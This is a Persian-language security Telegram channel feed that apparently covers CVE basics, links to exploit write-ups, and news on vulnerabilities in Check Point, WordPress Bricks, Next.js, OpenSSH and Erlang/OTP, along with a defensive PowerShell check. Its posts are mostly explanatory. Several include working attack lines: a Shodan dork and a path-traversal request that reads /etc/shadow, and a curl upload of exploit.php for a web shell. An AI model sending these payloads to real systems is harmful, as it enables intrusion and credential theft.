Try Hack Box
Common Vulnerabilities and Exposures (CVE) چیست؟ T.me/TryHackBox
Common Vulnerabilities and Exposures (CVE) چیست؟
آسیبپذیریها و مواجهههای رایج (CVE) فهرستی از نقصهای امنیتی رایانه است که بر اساس اقدامات حیاتی برای کمک به افراد و شرکتها در ارزیابی خطر ناشی از آسیبپذیری یا قرار گرفتن در معرض خودتان رتبهبندی میشوند. وقتی شخصی به یک CVE مراجعه میکند، میتوانید به راحتی آسیبپذیری را با جستجو پیدا کنید، و بهدلیل بررسی ساختاریافته و مستمر و مستندسازی آسیبپذیری یا قرار گرفتن در معرض به شیوهای ثابت، میتوانید به راحتی از اهمیت خطر برای سازمان خود مطمئن شوید. هشدارهای امنیتی صادر شده توسط فروشندگان یا محققان تقریباً همیشه حداقل یک شناسه CVE را ذکر می کنند.
ورودیهای CVE مختصر هستند، شامل دادههای فنی، یا اطلاعاتی درباره تأثیرات احتمالی یا خود اصلاحها نمیشوند. این جزئیات در سایر پایگاههای داده، از جمله پایگاه داده آسیبپذیری ملی ایالات متحده (NVD)، پایگاه یادداشتهای آسیبپذیری CERT/CC، و فهرستهای اضافی که توسط فروشنده مورد نظر یا سایر سازمانهای امنیت سایبری کنترل میشوند، ظاهر میشوند. در سراسر این سیستمهای مختلف، شناسههای CVE راهی قابل اعتماد برای درک نقصهای امنیتی منحصربهفرد به روشی قابل تکرار به کاربران میدهند.
یک استاندارد مرتبط برای رتبهبندی بحرانی بودن یک CVE در سیستم امتیازدهی آسیبپذیری مشترک (CVSS) یافت میشود، مجموعهای از استانداردهای باز برای تخصیص یک عدد به یک آسیبپذیری برای ارزیابی شدت آن. امتیازات CVSS در مشاورههای CVE، NVD و CERT فهرست شدهاند. امتیازها از 0.0 تا 10.0 متغیر است که اعداد بالاتر نشان دهنده درجه بالاتری از شدت آسیب پذیری هستند. بسیاری از فروشندگان امنیتی سیستم های امتیازدهی خود را نیز ایجاد کرده اند.
CVE توسط شرکت MITRE مدیریت میشود که توسط آژانس امنیت سایبری و امنیت زیرساخت (CISA)، بخشی از وزارت امنیت داخلی ایالات متحده تأمین مالی میشود.
#cve
@TryHackBox
آسیبپذیریها و مواجهههای رایج (CVE) فهرستی از نقصهای امنیتی رایانه است که بر اساس اقدامات حیاتی برای کمک به افراد و شرکتها در ارزیابی خطر ناشی از آسیبپذیری یا قرار گرفتن در معرض خودتان رتبهبندی میشوند. وقتی شخصی به یک CVE مراجعه میکند، میتوانید به راحتی آسیبپذیری را با جستجو پیدا کنید، و بهدلیل بررسی ساختاریافته و مستمر و مستندسازی آسیبپذیری یا قرار گرفتن در معرض به شیوهای ثابت، میتوانید به راحتی از اهمیت خطر برای سازمان خود مطمئن شوید. هشدارهای امنیتی صادر شده توسط فروشندگان یا محققان تقریباً همیشه حداقل یک شناسه CVE را ذکر می کنند.
ورودیهای CVE مختصر هستند، شامل دادههای فنی، یا اطلاعاتی درباره تأثیرات احتمالی یا خود اصلاحها نمیشوند. این جزئیات در سایر پایگاههای داده، از جمله پایگاه داده آسیبپذیری ملی ایالات متحده (NVD)، پایگاه یادداشتهای آسیبپذیری CERT/CC، و فهرستهای اضافی که توسط فروشنده مورد نظر یا سایر سازمانهای امنیت سایبری کنترل میشوند، ظاهر میشوند. در سراسر این سیستمهای مختلف، شناسههای CVE راهی قابل اعتماد برای درک نقصهای امنیتی منحصربهفرد به روشی قابل تکرار به کاربران میدهند.
یک استاندارد مرتبط برای رتبهبندی بحرانی بودن یک CVE در سیستم امتیازدهی آسیبپذیری مشترک (CVSS) یافت میشود، مجموعهای از استانداردهای باز برای تخصیص یک عدد به یک آسیبپذیری برای ارزیابی شدت آن. امتیازات CVSS در مشاورههای CVE، NVD و CERT فهرست شدهاند. امتیازها از 0.0 تا 10.0 متغیر است که اعداد بالاتر نشان دهنده درجه بالاتری از شدت آسیب پذیری هستند. بسیاری از فروشندگان امنیتی سیستم های امتیازدهی خود را نیز ایجاد کرده اند.
CVE توسط شرکت MITRE مدیریت میشود که توسط آژانس امنیت سایبری و امنیت زیرساخت (CISA)، بخشی از وزارت امنیت داخلی ایالات متحده تأمین مالی میشود.
#cve
@TryHackBox
Forwarded from Network Penetration Testing
CVE-2021-42287
Weaponisation - Active Directory
https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html
#AD
#cve
@NetPentester
Weaponisation - Active Directory
https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html
#AD
#cve
@NetPentester
CVE چیست ؟
مخفف "شناسهی تهدید واحد" (Common Vulnerabilities and Exposures) است که یک شناسهی یکتا برای هر آسیب پذیری در یک نرمافزار، سیستم عامل، دستگاه یا سرویس اینترنتی است. این شناسهها برای شناسایی آسیب پذیریها و مدیریت ریسکهای امنیتی بسیار مفید هستند.
از سال 1999 توسط رابرت مارتین (Robert Martin) به همراه تیم امنیتی MITRE Corporation تاسیس شده است و با هدف دادن یک شناسهی یکتا به هر آسیب پذیری، کمک به تبادل اطلاعات و تطابق بین بخشهای مختلف صنعت امنیتی را فراهم کرده است.
هر CVE شامل یک شناسهی یکتا، توضیحاتی در مورد آسیب پذیری، اثرات آن، راه حلهای احتمالی و منابع مرتبط است. این شناسهها به صورت عمومی در دسترس هستند و هرکسی میتواند از آنها برای شناسایی و رفع آسیب پذیریهای مشابه در سیستمهای خود استفاده کند
چگونه cve خود را ثبت کنیم ؟
ثبت یک CVE (شناسهی تهدید واحد)، مراحلی نیاز دارد که در ادامه توضیح داده شده است:
جمع آوری اطلاعات: اولین مرحله در ثبت یک CVE، جمع آوری اطلاعات مربوط به آسیب پذیری است. این اطلاعات شامل نوع و نسخه سیستم عامل، نوع و نسخه نرمافزار، قابلیتهای مورد تاثیر و … میشود.
ایجاد گزارش: پس از جمع آوری اطلاعات، باید یک گزارش ایجاد کرد. این گزارش شامل توضیحات دقیق در مورد آسیب پذیری، روشهای تست آن، نتایج حاصل، و… میشود.
تأیید گزارش: پس از ایجاد گزارش، باید مطمئن شوید که آن آسیب پذیری، واقعی و قابل تأیید است.
ارسال گزارش: برای ثبت یک CVE باید به سایت CVE Mitre رفته و فرم مربوط به ثبت CVE را پر کرد. در این فرم، باید اطلاعات جمع آوری شده و همچنین گزارش ایجاد شده را بارگذاری کنید.
منتظر ماندن: پس از ارسال گزارش، باید منتظر تأیید و پذیرش CVE باشید. این فرآیند ممکن است چند هفته طول بکشد.
دریافت CVE: در صورت پذیرش CVE، شما یک شناسهی یکتا برای آن آسیب پذیری دریافت میکنید. سپس میتوانید این شناسه را در گزارش خود و یا در سایر مستندات مربوط به آن آسیب پذیری استفاده کنید.
توجه داشته باشید که CVE تکراری نباشد .
#CVE
@TryHackBox
مخفف "شناسهی تهدید واحد" (Common Vulnerabilities and Exposures) است که یک شناسهی یکتا برای هر آسیب پذیری در یک نرمافزار، سیستم عامل، دستگاه یا سرویس اینترنتی است. این شناسهها برای شناسایی آسیب پذیریها و مدیریت ریسکهای امنیتی بسیار مفید هستند.
از سال 1999 توسط رابرت مارتین (Robert Martin) به همراه تیم امنیتی MITRE Corporation تاسیس شده است و با هدف دادن یک شناسهی یکتا به هر آسیب پذیری، کمک به تبادل اطلاعات و تطابق بین بخشهای مختلف صنعت امنیتی را فراهم کرده است.
هر CVE شامل یک شناسهی یکتا، توضیحاتی در مورد آسیب پذیری، اثرات آن، راه حلهای احتمالی و منابع مرتبط است. این شناسهها به صورت عمومی در دسترس هستند و هرکسی میتواند از آنها برای شناسایی و رفع آسیب پذیریهای مشابه در سیستمهای خود استفاده کند
چگونه cve خود را ثبت کنیم ؟
ثبت یک CVE (شناسهی تهدید واحد)، مراحلی نیاز دارد که در ادامه توضیح داده شده است:
جمع آوری اطلاعات: اولین مرحله در ثبت یک CVE، جمع آوری اطلاعات مربوط به آسیب پذیری است. این اطلاعات شامل نوع و نسخه سیستم عامل، نوع و نسخه نرمافزار، قابلیتهای مورد تاثیر و … میشود.
ایجاد گزارش: پس از جمع آوری اطلاعات، باید یک گزارش ایجاد کرد. این گزارش شامل توضیحات دقیق در مورد آسیب پذیری، روشهای تست آن، نتایج حاصل، و… میشود.
تأیید گزارش: پس از ایجاد گزارش، باید مطمئن شوید که آن آسیب پذیری، واقعی و قابل تأیید است.
ارسال گزارش: برای ثبت یک CVE باید به سایت CVE Mitre رفته و فرم مربوط به ثبت CVE را پر کرد. در این فرم، باید اطلاعات جمع آوری شده و همچنین گزارش ایجاد شده را بارگذاری کنید.
منتظر ماندن: پس از ارسال گزارش، باید منتظر تأیید و پذیرش CVE باشید. این فرآیند ممکن است چند هفته طول بکشد.
دریافت CVE: در صورت پذیرش CVE، شما یک شناسهی یکتا برای آن آسیب پذیری دریافت میکنید. سپس میتوانید این شناسه را در گزارش خود و یا در سایر مستندات مربوط به آن آسیب پذیری استفاده کنید.
توجه داشته باشید که CVE تکراری نباشد .
#CVE
@TryHackBox
cve.mitre.org
CVE -
CVE
CVE
The mission of the CVE™ Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities.
👍5🔥1
👩💻 آسیب پذیری: VMware vRealize Network Insight - RCE with Pre-Authentication (CVE-2023-20887)
این پست به بررسی بهره برداری از CVE-2023-20887 در VMware Aria Operations for Networks (که قبلاً vRealize Network Insight نامیده می شد) می پردازد.
این آسیبپذیری شامل زنجیرهای از دو مسئله اجرای کد از راه دور (RCE) است که میتواند توسط مهاجمان احراز هویت نشده مورد سوء استفاده قرار گیرد.
⏺ لینک به Exploit
⏺ پیوند به مطالعه CVE
#VMware #RCE #CVE
@TryHackBox
@TryHackBoxOfficial
این پست به بررسی بهره برداری از CVE-2023-20887 در VMware Aria Operations for Networks (که قبلاً vRealize Network Insight نامیده می شد) می پردازد.
این آسیبپذیری شامل زنجیرهای از دو مسئله اجرای کد از راه دور (RCE) است که میتواند توسط مهاجمان احراز هویت نشده مورد سوء استفاده قرار گیرد.
⏺ لینک به Exploit
⏺ پیوند به مطالعه CVE
#VMware #RCE #CVE
@TryHackBox
@TryHackBoxOfficial
CVE-2024-2448
RCE
در متعادل کننده LoadMaster ، که به طور گسترده توسط Amazon ، Disney ، ASOS و سایر شرکت ها استفاده می شود.
تحقیق : https://rhinosecuritylabs.com/research/cve-2024-2448-kemp-loadmaster/
#CVE
@TryHackBox
RCE
در متعادل کننده LoadMaster ، که به طور گسترده توسط Amazon ، Disney ، ASOS و سایر شرکت ها استفاده می شود.
تحقیق : https://rhinosecuritylabs.com/research/cve-2024-2448-kemp-loadmaster/
#CVE
@TryHackBox
همه در مورد CVE-2024-24919 می نویسند و ما در مورد آن خواهیم نوشت.
🔍 Dork for Shodan: title:"Check Point" ssl:"target"
عملیات👇
#CVE
@TryHackBox
🔍 Dork for Shodan: title:"Check Point" ssl:"target"
عملیات👇
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
#CVE
@TryHackBox
🔖 regreSSHion
آسیبپذیری RCE پیش تأیید از راه دور در سرور OpenSSH
اگر آسیب پذیری حیاتی در یک سرویس محبوب نباشد، چه چیز دیگری می تواند یک روز عادی در جامعه امنیت اطلاعات را وارونه کند؟
این آسیب پذیری به عنوان CVE-2024-6387 شناسایی شده است و OpenSSH را تحت تأثیر قرار می دهد (از نسخه >= 8.5 و < 4.4). این به شما امکان می دهد تا از راه دور کد را به عنوان root در سیستم های لینوکس مبتنی بر glibc اجرا کنید.
👈 بخوانید
#research #CVE
@TryHackBox
آسیبپذیری RCE پیش تأیید از راه دور در سرور OpenSSH
اگر آسیب پذیری حیاتی در یک سرویس محبوب نباشد، چه چیز دیگری می تواند یک روز عادی در جامعه امنیت اطلاعات را وارونه کند؟
این آسیب پذیری به عنوان CVE-2024-6387 شناسایی شده است و OpenSSH را تحت تأثیر قرار می دهد (از نسخه >= 8.5 و < 4.4). این به شما امکان می دهد تا از راه دور کد را به عنوان root در سیستم های لینوکس مبتنی بر glibc اجرا کنید.
👈 بخوانید
#research #CVE
@TryHackBox
👍6❤2
Try Hack Box
Photo
در بولتن امنیتی دسامبر مایکروسافت، یک باگ به نام CVE-2024-49112 وجود دارد که سر و صدای زیادی به پا کرد و فکر میشد که با یک پچ برطرف شود. اما اینطور نشد... در برخی گروهها، Proof of Concept (PoC) این باگ به قیمت ۱۵۷ دلار فروخته میشود.
این آسیبپذیری در پروتکل Lightweight Directory Access Protocol) LDAP) در سیستمهای Microsoft Windows وجود دارد و به مهاجمان غیرمجاز اجازه میدهد تا از طریق درخواستهای LDAP دستکاریشده، کدهای مخرب را به صورت ریموت اجرا کنند. این موضوع میتواند منجر به تسلط کامل بر سیستم و نشت دادهها شود.
💡 چرا این موضوع مهم است:
☠️ دسترسی غیرقابل کنترل به سیستمهای آسیبپذیر.
☠️ احتمال نشت دادهها و اختلال در سرویسها.
☠️ خطر آلودهشدن گسترده شبکه.
🛡️ اقدامات پیشنهادی:
✅ بررسی کنید که اتصالات RPC ورودی فقط از شبکههای داخلی قابل اعتماد مجاز باشند.
✅ مطمئن شوید که کنترلرهای دامنه دسترسی مستقیم به اینترنت ندارند (فقط DNS اگر روی کنترلر باشد).
✅ سیستم خود را از نظر پیکربندیهای آسیبپذیر با استفاده از اسکریپتها یا ابزارهای تخصصی بررسی کنید.
✅ آخرین پچ های امنیتی مایکروسافت را نصب کنید.
✅ ترافیک LDAP و RPC را برای شناسایی فعالیتهای مشکوک زیر نظر بگیرید.
اسکریپت برای بررسی دسترسی RPC و اتصال به اینترنت (برای بررسی توسط ادمینها روی کنترلرها):
#CVE
@TryHackBox
این آسیبپذیری در پروتکل Lightweight Directory Access Protocol) LDAP) در سیستمهای Microsoft Windows وجود دارد و به مهاجمان غیرمجاز اجازه میدهد تا از طریق درخواستهای LDAP دستکاریشده، کدهای مخرب را به صورت ریموت اجرا کنند. این موضوع میتواند منجر به تسلط کامل بر سیستم و نشت دادهها شود.
💡 چرا این موضوع مهم است:
☠️ دسترسی غیرقابل کنترل به سیستمهای آسیبپذیر.
☠️ احتمال نشت دادهها و اختلال در سرویسها.
☠️ خطر آلودهشدن گسترده شبکه.
🛡️ اقدامات پیشنهادی:
✅ بررسی کنید که اتصالات RPC ورودی فقط از شبکههای داخلی قابل اعتماد مجاز باشند.
✅ مطمئن شوید که کنترلرهای دامنه دسترسی مستقیم به اینترنت ندارند (فقط DNS اگر روی کنترلر باشد).
✅ سیستم خود را از نظر پیکربندیهای آسیبپذیر با استفاده از اسکریپتها یا ابزارهای تخصصی بررسی کنید.
✅ آخرین پچ های امنیتی مایکروسافت را نصب کنید.
✅ ترافیک LDAP و RPC را برای شناسایی فعالیتهای مشکوک زیر نظر بگیرید.
اسکریپت برای بررسی دسترسی RPC و اتصال به اینترنت (برای بررسی توسط ادمینها روی کنترلرها):
# Detection script for CVE-2024-49112
Write-Output "Checking system configuration for CVE-2024-49112..."
# بررسی اینکه آیا سیستم یک کنترلر دامنه است یا نه
$isDomainController = (Get-WmiObject Win32_ComputerSystem).DomainRole -eq 4 -or (Get-WmiObject Win32_ComputerSystem).DomainRole -eq 5
if (-not $isDomainController) {
Write-Output "This system is not a Domain Controller. No action needed."
exit
}
# بررسی اینکه آیا اتصالات RPC ورودی از شبکههای غیرقابل اعتماد مسدود شدهاند یا نه
$rpcsrvstatus = Get-NetFirewallRule -DisplayName "*RPC*" | Where-Object {$_.Direction -eq "Inbound" -and $_.Enabled -eq "True"}
if ($rpcsrvstatus) {
Write-Output "Warning: Inbound RPC connections from untrusted networks are allowed. This configuration is vulnerable."
} else {
Write-Output "Inbound RPC connections from untrusted networks are blocked."
}
# بررسی اینکه آیا کنترلر دامنه دسترسی به اینترنت دارد یا نه
$internetAccess = Test-Connection -ComputerName "1.1.1.1" -Count 2 -Quiet
if ($internetAccess) {
Write-Output "Warning: Domain Controller has internet access. This configuration is vulnerable."
} else {
Write-Output "Domain Controller does not have internet access."
}
Write-Output "Detection complete."
#CVE
@TryHackBox
👍9🐳2🔥1
🧩 ما به اشتراکگذاری آسیبپذیریهای پرطرفدار و تهدیدات مرتبط با آنها ادامه میدهیم:
۱. گوگل جزئیات فنی درباره آسیبپذیری EntrySign (CVE-2024-56161) در سیستم بررسی امضای میکروکد AMD Zen را منتشر کرد. این آسیبپذیری به مهاجمان اجازه میدهد تا Firmware (نرمافزار داخلی) مخرب را نصب کنند.
گوگل همچنین ابزاری به نام Zentool را منتشر کرده است که برای جیلبریک (دسترسی غیرمجاز) پردازندههای AMD استفاده میشود.
۲. محققان Assetnote یک آسیبپذیری در سیستم مدیریت محتوای Sitecore کشف کردند که میتواند منجر به اجرای کد از راه دور (Remote Code Execution) شود. این آسیبپذیری با شناسه CVE-2025-27218 ثبت شده است.
۳. توسعهدهندگان Jenkins یک بهروزرسانی امنیتی منتشر کردند که چهار آسیبپذیری در هسته این پلتفرم را برطرف میکند.
۴. شرکت Elastic یک بهروزرسانی امنیتی برای Kibana منتشر کرد. این بهروزرسانی یک آسیبپذیری را برطرف میکند که میتواند منجر به اجرای کد دلخواه از طریق آپلود فایلهای مخرب یا درخواستهای HTTP دستکاریشده شود.
۵. یک گروه از محققان جزئیات یک نوع جدید از حمله الکترونیکی به اینورترهای (مبدلهای) نصبشده در نیروگاههای خورشیدی را ارائه کردند.
این حمله که ReThink نام دارد، میتواند به اینورترها آسیب فیزیکی وارد کند و عملکرد سیستمهای خورشیدی را مختل کند.
۶. محققان SEC Consult جزئیات یک آسیبپذیری به نام "زیبای خفته" را فاش کردند که میتواند حسگر CrowdStrike Falcon را غیرفعال کند.
SEC Consult
این مشکل را در پایان سال ۲۰۲۳ به تامینکننده گزارش داد، اما تامینکننده بدون رفع مشکل، آن را به عنوان یک "خلاء در تشخیص" عنوان کرد.
با این حال، این آسیبپذیری در سال ۲۰۲۵ برطرف شد و علیرغم سکوت تامینکننده، SEC Consult جزئیات آن را به صورت عمومی منتشر کرد.
۷. محققان SquareX یک افزونه پلیمورفیک (چندشکلی) برای کروم توسعه دادهاند که میتواند هر افزونه نصبشده محلی را تقلید کند.
این افزونهها یک کپی دقیق از آیکون، پنجرههای پاپآپ HTML و پروسس های افزونه اصلی ایجاد میکنند و حتی ممکن است افزونه اصلی را موقتاً غیرفعال کنند. این کار باعث میشود قربانیان باور کنند که در حال وارد کردن اطلاعات ورود به یک افزونه واقعی هستند.
#CVE
@TryHackBox
۱. گوگل جزئیات فنی درباره آسیبپذیری EntrySign (CVE-2024-56161) در سیستم بررسی امضای میکروکد AMD Zen را منتشر کرد. این آسیبپذیری به مهاجمان اجازه میدهد تا Firmware (نرمافزار داخلی) مخرب را نصب کنند.
گوگل همچنین ابزاری به نام Zentool را منتشر کرده است که برای جیلبریک (دسترسی غیرمجاز) پردازندههای AMD استفاده میشود.
۲. محققان Assetnote یک آسیبپذیری در سیستم مدیریت محتوای Sitecore کشف کردند که میتواند منجر به اجرای کد از راه دور (Remote Code Execution) شود. این آسیبپذیری با شناسه CVE-2025-27218 ثبت شده است.
۳. توسعهدهندگان Jenkins یک بهروزرسانی امنیتی منتشر کردند که چهار آسیبپذیری در هسته این پلتفرم را برطرف میکند.
۴. شرکت Elastic یک بهروزرسانی امنیتی برای Kibana منتشر کرد. این بهروزرسانی یک آسیبپذیری را برطرف میکند که میتواند منجر به اجرای کد دلخواه از طریق آپلود فایلهای مخرب یا درخواستهای HTTP دستکاریشده شود.
۵. یک گروه از محققان جزئیات یک نوع جدید از حمله الکترونیکی به اینورترهای (مبدلهای) نصبشده در نیروگاههای خورشیدی را ارائه کردند.
این حمله که ReThink نام دارد، میتواند به اینورترها آسیب فیزیکی وارد کند و عملکرد سیستمهای خورشیدی را مختل کند.
۶. محققان SEC Consult جزئیات یک آسیبپذیری به نام "زیبای خفته" را فاش کردند که میتواند حسگر CrowdStrike Falcon را غیرفعال کند.
SEC Consult
این مشکل را در پایان سال ۲۰۲۳ به تامینکننده گزارش داد، اما تامینکننده بدون رفع مشکل، آن را به عنوان یک "خلاء در تشخیص" عنوان کرد.
با این حال، این آسیبپذیری در سال ۲۰۲۵ برطرف شد و علیرغم سکوت تامینکننده، SEC Consult جزئیات آن را به صورت عمومی منتشر کرد.
۷. محققان SquareX یک افزونه پلیمورفیک (چندشکلی) برای کروم توسعه دادهاند که میتواند هر افزونه نصبشده محلی را تقلید کند.
این افزونهها یک کپی دقیق از آیکون، پنجرههای پاپآپ HTML و پروسس های افزونه اصلی ایجاد میکنند و حتی ممکن است افزونه اصلی را موقتاً غیرفعال کنند. این کار باعث میشود قربانیان باور کنند که در حال وارد کردن اطلاعات ورود به یک افزونه واقعی هستند.
#CVE
@TryHackBox
❤1👍1
#CVE-2025-29927
در فریمورک Next.js React یک آسیبپذیری امنیتی بحرانی شناسایی شده است که تحت شرایط خاص میتواند برای دور زدن بررسیهای احراز هویت مورد سوءاستفاده قرار گیرد.
این آسیبپذیری با شناسه CVE-2025-29927 ردیابی شده و امتیاز ۹.۱ از ۱۰ در مقیاس CVSS دارد.
Next.js از هدر داخلی
برای جلوگیری از ایجاد حلقههای بینهایت در درخواستهای بازگشتی استفاده میکند.
با این حال، رد شدن اجرای Middleware باعث میشود درخواستها بتوانند بررسیهای حیاتی، از جمله اعتبارسنجی کوکیهای احراز هویت، قبل از رسیدن به مسیرهای موردنظر را دور بزنند.
این مشکل در نسخههای ۱۲.۳.۵، ۱۳.۵.۹، ۱۴.۲.۲۵ و ۱۵.۲.۳ برطرف شده است. به عنوان راهکار موقت، توصیه میشود از پردازش درخواستهای کاربران خارجی که حاوی هدر
راشد علام (با نامهای مستعار zhero و cold-try )، محققی که این آسیبپذیری را کشف و گزارش کرد، جزئیات فنی بیشتری را افشا کرده است. بنابراین، توصیه میشود هرچه سریعتر پچ های امنیتی اعمال شوند.
به گفته JFrog، این باگ به مهاجمان اجازه میدهد به راحتی بررسیهای احراز هویت در Middleware ی Next.js را دور بزنند که ممکن است منجر به دسترسی به صفحات حساس وبسایت (مخصوص مدیران یا کاربران با دسترسی بالا) شود.
همچنین هشدار داده شده که هر وبسایتی که از Middleware برای کنترل دسترسی کاربران بدون بررسیهای اضافی استفاده میکند، در معرض این آسیبپذیری (CVE-2025-29927) قرار دارد و مهاجمان میتوانند به منابع غیرمجاز دسترسی پیدا کنند.
@TryHackBox
در فریمورک Next.js React یک آسیبپذیری امنیتی بحرانی شناسایی شده است که تحت شرایط خاص میتواند برای دور زدن بررسیهای احراز هویت مورد سوءاستفاده قرار گیرد.
این آسیبپذیری با شناسه CVE-2025-29927 ردیابی شده و امتیاز ۹.۱ از ۱۰ در مقیاس CVSS دارد.
Next.js از هدر داخلی
x-middleware-subrequest
برای جلوگیری از ایجاد حلقههای بینهایت در درخواستهای بازگشتی استفاده میکند.
با این حال، رد شدن اجرای Middleware باعث میشود درخواستها بتوانند بررسیهای حیاتی، از جمله اعتبارسنجی کوکیهای احراز هویت، قبل از رسیدن به مسیرهای موردنظر را دور بزنند.
این مشکل در نسخههای ۱۲.۳.۵، ۱۳.۵.۹، ۱۴.۲.۲۵ و ۱۵.۲.۳ برطرف شده است. به عنوان راهکار موقت، توصیه میشود از پردازش درخواستهای کاربران خارجی که حاوی هدر
x-middleware-subrequest
هستند، جلوگیری شود. راشد علام (با نامهای مستعار zhero و cold-try )، محققی که این آسیبپذیری را کشف و گزارش کرد، جزئیات فنی بیشتری را افشا کرده است. بنابراین، توصیه میشود هرچه سریعتر پچ های امنیتی اعمال شوند.
به گفته JFrog، این باگ به مهاجمان اجازه میدهد به راحتی بررسیهای احراز هویت در Middleware ی Next.js را دور بزنند که ممکن است منجر به دسترسی به صفحات حساس وبسایت (مخصوص مدیران یا کاربران با دسترسی بالا) شود.
همچنین هشدار داده شده که هر وبسایتی که از Middleware برای کنترل دسترسی کاربران بدون بررسیهای اضافی استفاده میکند، در معرض این آسیبپذیری (CVE-2025-29927) قرار دارد و مهاجمان میتوانند به منابع غیرمجاز دسترسی پیدا کنند.
@TryHackBox
👍1
آسیبپذیری CVE-2024-25600 در پلاگین Bricks وردپرس
معرفی آسیبپذیری:
این یک آسیبپذیری اجرای کد از راه دور (RCE) بدون نیاز به احراز هویت در پلاگین Bricks Builder وردپرس (نسخههای 1.9.6 و قبلتر) است.
جزئیات فنی:
- مکانیسم حمله:
- از طریق یک درخواست AJAX کنترلنشده در
- امکان آپلود فایلهای PHP مخرب
- دسترسی کامل به سرور (web shell)
- کد آسیبپذیر:
نمونه اکسپلویت:
تأثیرات:
- نصب وبشل روی سرور
- دسترسی به پایگاه داده وردپرس
- امکان گسترش حمله به سایر سیستمها
راهکارهای مقابله:
1. فوری:
- ارتقاء به نسخه 1.9.7+
- غیرفعال کردن پلاگین تا زمان بهروزرسانی
2. پیشگیرانه:
- محدود کردن دسترسی به
- پیادهسازی WAF با قوانین مخصوص
تشخیص سوءاستفاده:
- بررسی لاگها برای درخواستهای غیرعادی به
- جستجوی فایلهای PHP جدید در دایرکتوری uploads
نکته اخلاقی:
این اطلاعات فقط برای اهداف آموزشی هست .
https://github.com/Chocapikk/CVE-2024-25600
#Cve
@TryHackBox
معرفی آسیبپذیری:
این یک آسیبپذیری اجرای کد از راه دور (RCE) بدون نیاز به احراز هویت در پلاگین Bricks Builder وردپرس (نسخههای 1.9.6 و قبلتر) است.
جزئیات فنی:
- مکانیسم حمله:
- از طریق یک درخواست AJAX کنترلنشده در
admin-ajax.php
- امکان آپلود فایلهای PHP مخرب
- دسترسی کامل به سرور (web shell)
- کد آسیبپذیر:
// در فایل اصلی پلاگین
add_action('wp_ajax_bricks_upload', 'handle_file_upload');
// عدم وجود بررسیهای امنیتی کافی
نمونه اکسپلویت:
curl -X POST "http://target.com/wp-admin/admin-ajax.php" \
-F "action=bricks_upload" \
-F "file=@exploit.php"
تأثیرات:
- نصب وبشل روی سرور
- دسترسی به پایگاه داده وردپرس
- امکان گسترش حمله به سایر سیستمها
راهکارهای مقابله:
1. فوری:
- ارتقاء به نسخه 1.9.7+
- غیرفعال کردن پلاگین تا زمان بهروزرسانی
2. پیشگیرانه:
- محدود کردن دسترسی به
admin-ajax.php
- پیادهسازی WAF با قوانین مخصوص
تشخیص سوءاستفاده:
- بررسی لاگها برای درخواستهای غیرعادی به
admin-ajax.php
- جستجوی فایلهای PHP جدید در دایرکتوری uploads
نکته اخلاقی:
این اطلاعات فقط برای اهداف آموزشی هست .
https://github.com/Chocapikk/CVE-2024-25600
#Cve
@TryHackBox
GitHub
GitHub - Chocapikk/CVE-2024-25600: Unauthenticated Remote Code Execution – Bricks <= 1.9.6
Unauthenticated Remote Code Execution – Bricks <= 1.9.6 - Chocapikk/CVE-2024-25600
👍1
سیسکو تأیید میکند که برخی از محصولات آن تحت تأثیر آسیبپذیری بحرانی اجرای کد از راه دور در Erlang/OTP با شناسه CVE-2025-32433 قرار گرفتهاند.
این آسیبپذیری که توسط گروهی از محققان دانشگاه روهر در بوخوم (آلمان) کشف شده است، با شناسه CVE-2025-32433 ردیابی میشود و به عنوان مشکلی در پردازش پیامهای پروتکل SSH شرح داده میشود که ممکن است به یک مهاجم غیرمجاز اجازه دهد به سیستمهای آسیبپذیر دسترسی پیدا کرده و کد دلخواه اجرا کند.
محققان هشدار دادند که بهرهبرداری از این آسیبپذیری میتواند منجر به تسلط کامل میزبانها شود که به افراد ثالث اجازه میدهد به دادههای حساس دسترسی غیرمجاز پیدا کرده و آنها را دستکاری کنند، و همچنین حملات نوع DoS انجام دهند.
CVE-2025-32433
در نسخههای OTP-27.3.3، OTP-26.2.5.11 و OTP-25.3.2.20 اصلاح شده است. نسخههای قبلی تحت تأثیر قرار دارند.
چندی پس از اینکه وجود این آسیبپذیری آشکار شد، جامعه متخصصان امنیت سایبری دریافتند که بهرهبرداری از CVE-2025-32433 بسیار ساده است و جزئیات فنی و اسکریپتهای PoC ظرف ۲۴ ساعت عموماً در دسترس قرار گرفتند.
محققان Qualys معتقدند که پس از کشف این خطا، بسیاری از دستگاهها ممکن است در معرض حملات قرار بگیرند، با توجه به اینکه اکثر دستگاههای Cisco و Ericsson از Erlang استفاده میکنند.
هر سرویسی که از کتابخانه SSH Erlang/OTP برای دسترسی از راه دور استفاده میکند، مانند آنچه در دستگاههای OT/IoT و دستگاههای محاسبات لبه استفاده میشود، در معرض خطر هک قرار دارد.
Arctic Wolf
نیز تأثیر بالقوه را تحلیل کرد و اشاره کرد که علاوه بر Ericsson و Cisco که Erlang را با چندین محصول خود مرتبط کردهاند، این نرمافزار توسط National Instruments، Broadcom، EMQ Technologies، Very Technology، Apache Software Foundation و Riak Technologies نیز استفاده میشود.
با این حال، برای این شرکتها معمولاً نصب جداگانهای از Erlang/OTP مورد نیاز است.
در همین حال، Cisco ادامه میدهد تا تأثیر CVE-2025-32433 را ارزیابی کند و گسترهای از محصولات مربوط به مسیریابی، سوئیچینگ، محاسبات یکپارچه، مدیریت شبکه و برنامههای شبکه را بررسی کند.
در حال حاضر، شرکت به طور قطعی تأیید میکند که محصولات ConfD، Network Services Orchestrator (NSO)، Smart PHY، Intelligent Node Manager و Ultra Cloud Core تحت تأثیر قرار گرفتهاند.
غول شبکهای اشاره کرد که اگرچه ConfD و NSO (که انتظار میرود در ماه مه اصلاح شوند) تحت تأثیر آسیبپذیری قرار دارند، به دلیل پیکربندی خود، آسیبپذیری اجرای کد از راه دور در آنها وجود ندارد.
#cve
@TryHackBox
این آسیبپذیری که توسط گروهی از محققان دانشگاه روهر در بوخوم (آلمان) کشف شده است، با شناسه CVE-2025-32433 ردیابی میشود و به عنوان مشکلی در پردازش پیامهای پروتکل SSH شرح داده میشود که ممکن است به یک مهاجم غیرمجاز اجازه دهد به سیستمهای آسیبپذیر دسترسی پیدا کرده و کد دلخواه اجرا کند.
